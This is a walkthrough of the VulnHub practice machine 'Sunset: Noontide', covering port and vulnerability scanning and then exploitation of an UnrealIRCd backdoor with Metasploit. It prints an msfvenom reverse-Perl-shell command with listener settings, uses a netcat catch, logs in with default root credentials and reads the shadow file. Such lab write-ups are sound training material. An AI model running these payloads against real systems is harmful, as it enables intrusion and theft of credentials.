data:image/s3,"s3://crabby-images/f6c29/f6c29af2444ceb76995a01aea02ae57e4d852118" alt=""
Table of Contents
Sunset: Noontide
“Sunset: Noontide” from VulnHub is designed to simulate real-world vulnerabilities and serves as a great practice target for ethical hackers and security professionals. The target machine was identified using netdiscover
, providing the following details:
- IP Address: 192.168.0.190
- MAC Address: 08:00:27:38:f3:2e
- Hostname: PCS Systemtechnik GmbH
data:image/s3,"s3://crabby-images/de656/de6565459081e3db6308952bfd23b3da08e91031" alt=""
The penetration test on the “Sunset: Noontide” virtual machine revealed several vulnerabilities, including:
- UnrealIRCd Backdoor Vulnerability
- The target machine was running UnrealIRCd, which contained a known backdoor allowing remote execution of arbitrary commands.
- Open Ports and Services
- Ports 6667 (IRC), 6697 (IRCS-U), and 8067 (Infi-async) were open, potentially exposing services to unauthorized access.
- Weak Authentication
- The root account had default credentials (
root:root
), making it easy for attackers to gain administrative access.
- The root account had default credentials (
- Lack of Encryption in Communications
- Services running on the machine did not enforce encryption, increasing the risk of man-in-the-middle attacks.
- Exploitable Remote Code Execution (RCE) Vulnerabilities
- Exploits available in Metasploit allowed successful remote code execution through Perl-based payloads.
- Absence of System Hardening
- The system lacked security measures such as firewall protections, intrusion detection systems (IDS), and privilege separation.
- Vulnerabilities in Outdated Software
- UnrealIRCd was found to be running an outdated version, which had publicly known exploits.
Network Scanning and Enumeration
To identify vulnerabilities, we performed various scanning techniques using Nmap.
1. TCP Connect Scan
A TCP connect scan (nmap -sT
) identified open ports and running services:
- Port 6667 – IRC
- Port 6697 – IRCS-U
- Port 8067 – Infi-async
2. SYN Scan
A SYN scan (nmap -sS
) confirmed the results from the TCP connect scan.
3. UDP and FIN Scans
- UDP Scan (
nmap -sU
): No results were found. - FIN Scan (
nmap -sF
): Reinforced previous scan results.
4. Version, OS & Script Scanning
An aggressive scan (nmap -A
) determined that the target machine was running UnrealIRCd, an IRC daemon with known vulnerabilities.
data:image/s3,"s3://crabby-images/2b35e/2b35ef4e0c6eb585b99bce6effef3930a6a24ca6" alt=""
Vulnerability Scanning
To assess the system for known vulnerabilities, we used Nessus and OpenVAS.
1. Nessus Scan
Nessus reported open ports and provided insights into possible exploits.
data:image/s3,"s3://crabby-images/5fd06/5fd06d6527f748b48ed3cf116d7a4527795dbe2e" alt=""
2. OpenVAS Scan
OpenVAS delivered a detailed security report highlighting vulnerabilities associated with the identified services.
data:image/s3,"s3://crabby-images/eb02c/eb02c04a0fdf42864aae9e4f8cd1d0f70c2d7abc" alt=""
3. Nmap Vulnerability Scan
Executing nmap --script=vuln
revealed that UnrealIRCd had a known backdoor vulnerability, which could be exploited for remote access.
data:image/s3,"s3://crabby-images/aed1f/aed1f034774f3ddb0db77564aaf3c8e7b8a81aec" alt=""
data:image/s3,"s3://crabby-images/41426/414263d0064756e9f807328ecb76d66441ba3cd8" alt=""
Exploitation: Gaining Access
After identifying vulnerabilities, the next step was to exploit them using Metasploit.
1. Identifying Exploits
We searched for available exploits using searchsploit
, which returned an UnrealIRCd exploit within the Metasploit framework.
data:image/s3,"s3://crabby-images/8b4c3/8b4c37ecf3574ee2e2c09256d5e69d646ed8a498" alt=""
data:image/s3,"s3://crabby-images/58dfa/58dfaf1747b09c17b0d32f11fb75a7bcb7682606" alt=""
2. Using Metasploit for Exploitation
The Metasploit was used to search for “ircd” and an exploit was found for the detected vulnerability in the previous scans.
data:image/s3,"s3://crabby-images/fc715/fc71594975e6792f4cedb63df0c7a1e6958553b3" alt=""
Using the exploit, and changing the RHOST (Remote HOST) to the target machine 192.168.0.190.
data:image/s3,"s3://crabby-images/592de/592de075bc1437eebf171dc98cc34c6c3c92bb2a" alt=""
set RHOST 192.168.0.190
Method 1: Bind Ruby Payload
- The
bind_ruby
payload was tested but failed due to the absence of Ruby in UNIX systems by default.
data:image/s3,"s3://crabby-images/15b23/15b23aa06bd129a967e4aff916f0af0e61e553b4" alt=""
data:image/s3,"s3://crabby-images/1ce97/1ce97466c97718428a604d1ae4758926979775e7" alt=""
Method 2: Bind Perl Payload
- Switching to
bind_perl
successfully established a session. - Logged in as root using default credentials (
root:root
).
data:image/s3,"s3://crabby-images/2fe89/2fe89ca3c922f50e15c59428293a6b2fcfc2f96d" alt=""
data:image/s3,"s3://crabby-images/c1ba7/c1ba7e00adfb473b2428bfa4216bc6fcfb1c6ac9" alt=""
The exploit worked and a session was created. Since, perl language is present in UNIX by default.
Checking the users list on the target machine, we can see multiple users have been created.
data:image/s3,"s3://crabby-images/b7eb5/b7eb58fdbcd19b9fc0e74a1cfaff7560b633c191" alt=""
Logging in as root, keeping the username as root and the password simply as “root”. I was able to login, due to this being a test machine.
data:image/s3,"s3://crabby-images/5cb25/5cb255e353c835305b8d77961a2a0f3a66452d08" alt=""
Viewing the shadow file
data:image/s3,"s3://crabby-images/11777/11777471edcd89c2436d3df105a9ecc298a01e0d" alt=""
Method 3: Reverse Perl Payload
- Used the
reverse_perl
payload to create a reverse shell. - Set the following parameters:
set LHOST 192.168.0.192 set LPORT 8000
- Successfully gained shell access (
whoami
returnedserver
).
data:image/s3,"s3://crabby-images/35f67/35f677f15e65f592bd4853ce5ff02520ea908d4c" alt=""
Alternate Method – Manual Exploitation Sunset:noontide Vulnhub
The searchsploit result returned a Remote Downloader/Execute exploit.
data:image/s3,"s3://crabby-images/b4e0c/b4e0cc32b1f4cf9e1401d60116238444816aede9" alt=""
Searching for the method Remote Downloader/Execute written above linux/remote/13853.pl, I found a link https://www.yeahhub.com/exploitation-unrealircd-using-metasploit-perl-script/ that had a detail description of how to use the exploit, and change it as per my target and environment.
The Perl exploit script was located
data:image/s3,"s3://crabby-images/8de0d/8de0d4cb33b659e3cec0f56525904b6727a1d698" alt=""
A copy was made to the current working directory
data:image/s3,"s3://crabby-images/07b3e/07b3ef49df96a0bc4bab8bd0ba37036c9c066930" alt=""
Using msfvenom
, a custom payload was created:
msfvenom -p cmd/unix/reverse_perl LHOST=192.168.0.192 LPORT=8000 -f raw
-p tells the payload to be unix and a reverse perl,
-f tells that the output of the payload should be raw, meaning the output to be written in the text mode output, so it can be copied and used in a different program etc
- The generated payload was integrated into the exploit.
- Netcat was used to listen on port 8000, capturing the reverse connection from the target machine.
The obtained script from msfvenom was used to edit the exploit copied previously.
data:image/s3,"s3://crabby-images/d5cb7/d5cb7943a177fe0ecebdb46d8b94478e1c477d20" alt=""
The below command was used to send the exploit to the target machine.
data:image/s3,"s3://crabby-images/58c2e/58c2ebf8717ceb1bc3a39b2c5c8d2237f3c60fd1" alt=""
Netcat was used to hear on port 8000, as port 8000 was selected as LPORT during the exploit creation in msfvenom
data:image/s3,"s3://crabby-images/b768e/b768ef917cf8655150e1aa579812c140ed4e55ab" alt=""
A reverse connection was created, and we are now connected to the target machine.
data:image/s3,"s3://crabby-images/01ba9/01ba922ae63378459881dcdf446edda2cd6757b2" alt=""
data:image/s3,"s3://crabby-images/1a129/1a129f689d629b1355662908d9713f37b0a50129" alt=""
data:image/s3,"s3://crabby-images/be639/be639426754ab1f1c415643d5d3e4cb7ffb19a65" alt=""
data:image/s3,"s3://crabby-images/b32dc/b32dc6b377ee0ddbac20c368c43f830eda74e396" alt=""
Best Practices for Penetration Testing
- Always Obtain Permission: Ethical hacking should only be performed with explicit authorization.
- Use Multiple Scanning Tools: Combine Nmap, Nessus, and OpenVAS for thorough vulnerability assessment.
- Document Findings: Maintain detailed reports of vulnerabilities and mitigation steps.
- Implement Patches and Updates: Apply security patches to eliminate discovered vulnerabilities.
- Continuous Monitoring: Regularly conduct penetration tests to stay ahead of evolving threats.
Conclusion
This comprehensive penetration test demonstrates the importance of reconnaissance, scanning, vulnerability assessment, and exploitation of security flaws in a virtual machine. By leveraging tools like Nmap, Nessus, OpenVAS, Metasploit, and MSFVenom, we successfully identified and exploited a backdoor vulnerability in UnrealIRCd.
Key Takeaways
- Network scanning with Nmap helps identify open ports and services.
- Nessus and OpenVAS provide valuable vulnerability reports.
- Exploitation using Metasploit allows ethical hackers to assess system weaknesses.
- MSFVenom creates custom payloads for advanced penetration testing.
- Ethical hacking enhances cybersecurity and helps prevent cyber threats.
By following proper cybersecurity practices, organizations can proactively secure their systems and prevent potential breaches.